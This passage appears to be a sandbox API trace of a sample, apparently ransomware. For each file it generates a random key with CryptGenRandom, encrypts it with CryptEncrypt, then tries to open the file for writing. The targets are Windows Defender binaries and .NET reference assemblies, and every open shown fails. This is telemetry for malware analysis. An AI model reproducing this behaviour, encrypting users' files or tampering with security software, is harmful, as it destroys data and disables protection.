[0113.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c205a0 | out: hHeap=0x2c0000) returned 1 [0113.144] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248faa8 | out: pbBuffer=0x248faa8) returned 1 [0113.147] GetProcessHeap () returned 0x2c0000 [0113.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.148] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248faa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248faa0*=0x30) returned 1 [0113.148] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MSASCui.exe" (normalized: "c:\\program files\\windows defender\\msascui.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.148] GetProcessHeap () returned 0x2c0000 [0113.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.148] GetProcessHeap () returned 0x2c0000 [0113.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c204f0 | out: hHeap=0x2c0000) returned 1 [0113.148] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248faa8 | out: pbBuffer=0x248faa8) returned 1 [0113.148] GetProcessHeap () returned 0x2c0000 [0113.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.148] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248faa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248faa0*=0x30) returned 1 [0113.148] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpSvc.dll" (normalized: "c:\\program files\\windows defender\\mpsvc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.148] GetProcessHeap () returned 0x2c0000 [0113.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.148] GetProcessHeap () returned 0x2c0000 [0113.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d2a0 | out: hHeap=0x2c0000) returned 1 [0113.149] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248faa0 | out: pbBuffer=0x248faa0) returned 1 [0113.149] GetProcessHeap () returned 0x2c0000 [0113.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.149] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa98*=0x30) returned 1 [0113.149] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpRTP.dll" (normalized: "c:\\program files\\windows defender\\mprtp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.149] GetProcessHeap () returned 0x2c0000 [0113.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.149] GetProcessHeap () returned 0x2c0000 [0113.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d1f8 | out: hHeap=0x2c0000) returned 1 [0113.150] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248faa0 | out: pbBuffer=0x248faa0) returned 1 [0113.150] GetProcessHeap () returned 0x2c0000 [0113.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.150] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa98*=0x30) returned 1 [0113.150] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.150] GetProcessHeap () returned 0x2c0000 [0113.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.150] GetProcessHeap () returned 0x2c0000 [0113.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d000 | out: hHeap=0x2c0000) returned 1 [0113.150] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa98 | out: pbBuffer=0x248fa98) returned 1 [0113.150] GetProcessHeap () returned 0x2c0000 [0113.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.151] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa90*=0x30) returned 1 [0113.151] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpEvMsg.dll" (normalized: "c:\\program files\\windows defender\\mpevmsg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.151] GetProcessHeap () returned 0x2c0000 [0113.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.151] GetProcessHeap () returned 0x2c0000 [0113.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20440 | out: hHeap=0x2c0000) returned 1 [0113.151] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa98 | out: pbBuffer=0x248fa98) returned 1 [0113.151] GetProcessHeap () returned 0x2c0000 [0113.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.151] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa90*=0x30) returned 1 [0113.151] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpCommu.dll" (normalized: "c:\\program files\\windows defender\\mpcommu.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.151] GetProcessHeap () returned 0x2c0000 [0113.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.151] GetProcessHeap () returned 0x2c0000 [0113.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20390 | out: hHeap=0x2c0000) returned 1 [0113.151] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa90 | out: pbBuffer=0x248fa90) returned 1 [0113.152] GetProcessHeap () returned 0x2c0000 [0113.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.152] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa88*=0x30) returned 1 [0113.152] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpCmdRun.exe" (normalized: "c:\\program files\\windows defender\\mpcmdrun.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.152] GetProcessHeap () returned 0x2c0000 [0113.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.152] GetProcessHeap () returned 0x2c0000 [0113.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20180 | out: hHeap=0x2c0000) returned 1 [0113.152] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa90 | out: pbBuffer=0x248fa90) returned 1 [0113.152] GetProcessHeap () returned 0x2c0000 [0113.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.152] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa88*=0x30) returned 1 [0113.152] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.165] GetProcessHeap () returned 0x2c0000 [0113.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.165] GetProcessHeap () returned 0x2c0000 [0113.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c202e0 | out: hHeap=0x2c0000) returned 1 [0113.173] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa80 | out: pbBuffer=0x248fa80) returned 1 [0113.173] GetProcessHeap () returned 0x2c0000 [0113.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.173] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa78*=0x30) returned 1 [0113.173] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Xml.Linq.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.xml.linq.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.174] GetProcessHeap () returned 0x2c0000 [0113.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.174] GetProcessHeap () returned 0x2c0000 [0113.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc4968 | out: hHeap=0x2c0000) returned 1 [0113.174] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa78 | out: pbBuffer=0x248fa78) returned 1 [0113.174] GetProcessHeap () returned 0x2c0000 [0113.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.174] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa70*=0x30) returned 1 [0113.174] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.WorkflowServices.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.workflowservices.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.175] GetProcessHeap () returned 0x2c0000 [0113.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.175] GetProcessHeap () returned 0x2c0000 [0113.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cc48 | out: hHeap=0x2c0000) returned 1 [0113.175] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa78 | out: pbBuffer=0x248fa78) returned 1 [0113.175] GetProcessHeap () returned 0x2c0000 [0113.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.175] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa70*=0x30) returned 1 [0113.175] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Windows.Presentation.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.windows.presentation.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.175] GetProcessHeap () returned 0x2c0000 [0113.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.175] GetProcessHeap () returned 0x2c0000 [0113.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dea3c0 | out: hHeap=0x2c0000) returned 1 [0113.175] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa70 | out: pbBuffer=0x248fa70) returned 1 [0113.175] GetProcessHeap () returned 0x2c0000 [0113.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.175] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa68*=0x30) returned 1 [0113.175] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Routing.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.routing.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.176] GetProcessHeap () returned 0x2c0000 [0113.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.176] GetProcessHeap () returned 0x2c0000 [0113.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35d360 | out: hHeap=0x2c0000) returned 1 [0113.176] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa70 | out: pbBuffer=0x248fa70) returned 1 [0113.176] GetProcessHeap () returned 0x2c0000 [0113.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.176] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa68*=0x30) returned 1 [0113.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.176] GetProcessHeap () returned 0x2c0000 [0113.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.177] GetProcessHeap () returned 0x2c0000 [0113.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cb40 | out: hHeap=0x2c0000) returned 1 [0113.177] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa68 | out: pbBuffer=0x248fa68) returned 1 [0113.177] GetProcessHeap () returned 0x2c0000 [0113.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.177] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa60*=0x30) returned 1 [0113.177] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.design.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.177] GetProcessHeap () returned 0x2c0000 [0113.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.177] GetProcessHeap () returned 0x2c0000 [0113.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dea2a8 | out: hHeap=0x2c0000) returned 1 [0113.177] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa68 | out: pbBuffer=0x248fa68) returned 1 [0113.177] GetProcessHeap () returned 0x2c0000 [0113.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.177] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa60*=0x30) returned 1 [0113.177] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.177] GetProcessHeap () returned 0x2c0000 [0113.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.177] GetProcessHeap () returned 0x2c0000 [0113.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35d260 | out: hHeap=0x2c0000) returned 1 [0113.178] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa60 | out: pbBuffer=0x248fa60) returned 1 [0113.178] GetProcessHeap () returned 0x2c0000 [0113.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.178] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa58*=0x30) returned 1 [0113.178] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.design.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.180] GetProcessHeap () returned 0x2c0000 [0113.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.180] GetProcessHeap () returned 0x2c0000 [0113.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ca38 | out: hHeap=0x2c0000) returned 1 [0113.180] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa60 | out: pbBuffer=0x248fa60) returned 1 [0113.180] GetProcessHeap () returned 0x2c0000 [0113.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.180] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa58*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa58*=0x30) returned 1 [0113.180] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.180] GetProcessHeap () returned 0x2c0000 [0113.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.180] GetProcessHeap () returned 0x2c0000 [0113.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c930 | out: hHeap=0x2c0000) returned 1 [0113.180] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa58 | out: pbBuffer=0x248fa58) returned 1 [0113.180] GetProcessHeap () returned 0x2c0000 [0113.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.181] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa50*=0x30) returned 1 [0113.181] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.design.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.181] GetProcessHeap () returned 0x2c0000 [0113.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.181] GetProcessHeap () returned 0x2c0000 [0113.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dea190 | out: hHeap=0x2c0000) returned 1 [0113.181] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa58 | out: pbBuffer=0x248fa58) returned 1 [0113.181] GetProcessHeap () returned 0x2c0000 [0113.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.181] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa50*=0x30) returned 1 [0113.181] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.abstractions.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.181] GetProcessHeap () returned 0x2c0000 [0113.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.181] GetProcessHeap () returned 0x2c0000 [0113.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c828 | out: hHeap=0x2c0000) returned 1 [0113.181] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa50 | out: pbBuffer=0x248fa50) returned 1 [0113.181] GetProcessHeap () returned 0x2c0000 [0113.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.182] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa48*=0x30) returned 1 [0113.182] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ServiceModel.Web.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.servicemodel.web.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.182] GetProcessHeap () returned 0x2c0000 [0113.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.182] GetProcessHeap () returned 0x2c0000 [0113.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c720 | out: hHeap=0x2c0000) returned 1 [0113.182] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa50 | out: pbBuffer=0x248fa50) returned 1 [0113.182] GetProcessHeap () returned 0x2c0000 [0113.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.182] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa48*=0x30) returned 1 [0113.183] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Net.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.net.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.183] GetProcessHeap () returned 0x2c0000 [0113.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.183] GetProcessHeap () returned 0x2c0000 [0113.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc6480 | out: hHeap=0x2c0000) returned 1 [0113.183] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa48 | out: pbBuffer=0x248fa48) returned 1 [0113.183] GetProcessHeap () returned 0x2c0000 [0113.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.183] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa40*=0x30) returned 1 [0113.183] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Management.Instrumentation.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.management.instrumentation.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.183] GetProcessHeap () returned 0x2c0000 [0113.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.183] GetProcessHeap () returned 0x2c0000 [0113.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cece28 | out: 